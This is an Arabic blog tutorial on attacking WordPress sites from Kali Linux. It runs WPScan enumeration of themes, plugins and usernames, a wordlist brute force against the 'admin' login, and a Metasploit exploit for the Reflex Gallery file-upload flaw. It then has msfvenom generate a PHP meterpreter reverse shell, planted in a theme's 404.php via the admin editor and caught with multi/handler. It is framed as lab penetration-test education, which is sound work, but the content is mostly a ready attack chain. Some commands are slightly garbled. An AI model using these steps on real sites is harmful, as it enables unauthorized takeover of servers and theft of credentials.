اختبار الاختراق مواقع ال وورد برس باستخدام WPScan و Metasploit

0


اليوم و في هادا المقال سوف نتعلم مع بعض كيف نقوم ب اختبار اختراق ل المواقع التي تستخدم الورد برس

المهاجم: كالي لينكس

الهدف: وردبريس

اداة WPScan
اداة WPScan تقوم ب عمل فحص ل مواقع الورد برس و فحص الاضافات المنوجودة على الموقع و الاداة موجود ب شكل افتراضي في الانضمة التالية  Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux و سوف نستخدم الاداة للعضور على الاضافات القديمة و التي عادتا ما تكون مصابة ب ثغرات

أشياء يمكن ل WPScan القيام به هي:

  1. اكتشاف إصدار الورد برس المثبت حاليا.
  2. يمكنك اكتشاف الملفات الحساسة مثل readme، robots.txt، استبدال قاعدة البيانات للملفات، وما إلى ذلك.
  3. ميزات -Detect تمكين على ووردبريس المثبتة حاليا.
  4. فحص و معرفة اصدار theme.



ل تحميل الاداة 

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git


ل عرض الخيارات المتوفرة في الاداة 
./wpscan.rb –h


معرفة اصدار الورد برس المستخدم داخل الموقع 

WPScan هو أداة عظيمة ل فحص مواقع وورد برس . الآن سنحاول القيام ببعض الفحص  الأساسي، وسوف نستخدم أدوات enumerate للعثور على معلومات حول themes، الإضافات، أسماء المستخدمين الخ.

الآن اكتب الأمر التالي ل فحص موقع  الوردبريس مع ال الخادم (web server )
./wpscan.rb -u http://192.168.0.101/wordpress/

بدلا من http://192.168.0.101/wordpress/ اكتب اسم موقع ويب تريد فحصه.

هنا وجدت الخادم: Apache/2.4.7, PHP /5.5.9 وردبريس الإصدار 4.8.1، و باستخدام هذه المعلومات يمكن للمهاجم التحقق من استغلالها في جوجل. وعلاوة على ذلك وجدت  انه  يمكن لأي شخص تصفح  الملفات المرفوعة على الموقع /wp-content/uploads لعرض الملفات والمحتويات التي تم تحميلها.



Enumerating wordpress Theme

وهناك theme يتحكم في الشكل العام والمظهر من الموقع بما في ذلك أشياء مثل تخطيط الصفحة، و widget locations، والخطوط الافتراضية واللون الخيارات. WordPress.com لديها مجموعة واسعة من themes لمستخدمها ولكل themes لديه مميزاته 
ل فحص ال  themes المثبت على  الوردبريس  الأمر التالي:

./wpscan.rb -u http://192.168.0.101/wordpress/-enumerate t



Enumerating wordpress vulnerable Theme

لفحص Enumerating الأمر التالي:

./wpscan.rb -u http://192.168.0.101/wordpress/-enumerate فت

من نتيجة الفحص  لم نجد أي Enumerating  يحتوي على ثغرات  مما يعني أنه لا يوجد Enumerating  مصابة ب ثغرات  التي يمكن استغلالها.


Enumerating wordpress Plugins

الإضافات Plugins  هي سكربتات  صغيرة من التعليمات البرمجية للبرنامج والتي يمكن أن تضاف إلى موقع ووردبريس لتوسيع وظائفها.

للعثور على plugins المثبتة على موقع وردبريس المستهدف، اكتب :

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vt

 بعد بضع ثوان، سوف تحصل على النتيجة  ال   Plugins المثبة . يمكنك أن ترى أنه في نتيجة   الفحص   skismet v3.3.3, pixabay-images v2.14, wptouch v3.4.3 تم الكشف عن مثل هذه الأنواع من Plugins  المثبتة . فضلا عن أنها تصف أيضا آخر تحديث وأحدث نسخة من تلك Plugins في.




Enumerating wordpress vulnerable Plugins

الآن اكتب الأمر التالي ل فحص  الثغرات  في Plugins :

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vp


بعد بضع ثوان، سوف تحصل على نتيجة ال Plugins المصابة ب ثغرات  في الموقع. من الصورة يمكنك ملاحظة أن اللون الأحمر يشير الى وجود ثغرة في ال  Plugins وكذلك  ال exploits CVE



استغلال  ثغرات Plugins ب الميتا سبلويت Metasploit 

هذه ال module يستغل عشوائيPHP code upload in the WordPress Reflex Gallery version 3.1.3. 
يفحص  الثغرات  ل رفع  الشل  وتنفيذ الاوامر على السيرفر الموجود بيه الموقع المستهدف .

فتح ترمنال  ميتاسبلويتة وتنفيذ الأمر التالي:


use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msf exploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/

msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From given image you can observe the meterpreter session of victim’s web server.

meterpreter> sysinfo




Enumerating wordpress Usernames

من اجل الحصول على اسماء مدراء الموقع تنفيد الامر التالي : 

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate u


بعد مرور بعض الوقت سوف تضهر نتائج البحث على النحو التالي 
ID 1: admin
ID2: ignite
ID: demo


Enumerate ALL with single command

قمنا ب فحص الموقع في الاعلى و لكن هناك خيارات اخرى يجب ان تعرفها 

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u


–e at : 
جلب جميع اسماء ال themes في الموقع 
–e ap: 
جلب جميع اسماء ال plugins في الموقع 

–e u: 
جلب جميع اليوزرات داخل الموقع 


عمل هجوم Brute force attack ب اداة WPScan
بعدما قمنا ب الاعلى ب استخراج اسم المستخدم للموقع نحن الان جاهزون للقيام ب اختبار الاختراق و سوف نستخدم هجوم التخمين Brute force attack.
و هادا ب اعطاء الامر التالي 

./wpscan.rb –u http://192.168.0.101/wordpress/ –wordlist /root/Desktop/dict.txt –username admin


وسوف تبدأ اداة WPScan  ب مطابقة تركيبة صالحة من اسم المستخدم وكلمة المرور لتسجيل الدخول ومن ثم تفريغ النتيجة، من صورة التالية  يمكنك أن ترى أنه وجد اسم المستخدم و كلمة المرور   كما admin:password.


طريقة انشاء او رفع شل على الموقع 

يمكنك استخدام اليوزر و الباصورد  أعلاه لتسجيل الدخول إلى لوحة الادارة حيث يمكننا انشاء  أي موضوع، والاستفادة من حق المشرف سنحاول رفع ملف شل

ان كنت قد دخلت الى لوحة التحكم الخاصة ب الموقع ف ادهب الى Appearance و من ثم الى editor 



و الان قم ب تحديد template في الجانب الايمن بعد ذلك سوف تجد بعض سكربتات ال php في الإطار قم ب اختيار اي سكربت و قم ب مسح اكواده و وضع كود الشل 



الآن استخدم  msfvenom لتوليد شل php   واكتب الأمر التالي.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

يمكنك قراءة الشل الدي قمت ب توليه من خلال msfvenom ، في هذه اللحظة نحن بحاجة إلى نسخ النص من * <؟ php ……… .die ()؛  و سوف نقوم ب اضافته الى سكربت الورد برس للحصول على اتصال عكسي .


بعد نسخ كود الشل من *

او يمكنك استخدام Metasploit في هده العملة فلا توجد اي مشكلة في هادا 


use exploit/multi/handler

 msf exploit(handler) >set payload php/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.0.107

msf exploit(handler) >4444

msf exploit(handler) >exploit


بعد رفع كود الشل على الموقع نقوم ب استعراض ملف  404.php للحصول على اتصال عكسي 

http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php



من خلال ال screenshot سوف ترى ان وصول التبليغ قد وصلنا داخل الميتا سبلويت



Leave A Reply

Your email address will not be published.